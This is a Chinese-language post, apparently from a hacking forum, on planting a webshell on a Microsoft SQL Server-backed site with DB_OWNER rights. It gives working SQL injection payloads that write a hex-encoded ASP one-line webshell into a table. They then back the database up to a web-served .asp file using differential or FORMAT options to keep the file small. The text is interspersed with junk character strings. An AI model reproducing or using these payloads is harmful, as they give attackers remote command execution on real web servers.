DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

8 U% @/ O. ^9 x! \减少备份文件大小，得到可执行的webshell成功率提高不少
, C6 j0 x  H8 s) K# J: t: }一利用差异备份
8 s0 n  }8 l; A* K8 C' h/ p加一个参数WITH DIFFERENTIAL

1
: e, q. p5 [' ]5 h  j2
* ]1 u' u4 M  X; ]- ~" Q7 K3
4
$ l2 T" u% ^9 l declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
. S2 i; j5 H1 J; pinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
( I0 x5 c; ]: @7 F% t( x- W& S
& A$ K- S- N0 H& J: u) W6 V二利用完全FORMAT
) ^- Q  t; n& v1 W5 C/ F5 ~3 r加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
1 V9 j9 |: Z& X
1
2
3
4
# j  ^# B8 T! @2 Y; W declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
# e, r+ n! L! e0 l4 binsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
8 h( [3 ]$ b0 V% ~& v( |1 z
2 x1 {* k9 _3 G+ W& Z总的来说就是那么简单几句,下面以备份数据库model为例子
1
" C, _  s  ~( s/ @
5 I* e& _) y# |' W& Y" M( |) i1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
6 H* A3 ?* C" _% x$ Q* q& ~, n8 [% u
2
% {4 E# H# D  ]3 s
% @7 I7 X  u+ A) L1
8 f; @4 a' {) }, G" O: \9 B' r id=1;backup database model to disk='你的路径‘ with differential,format;--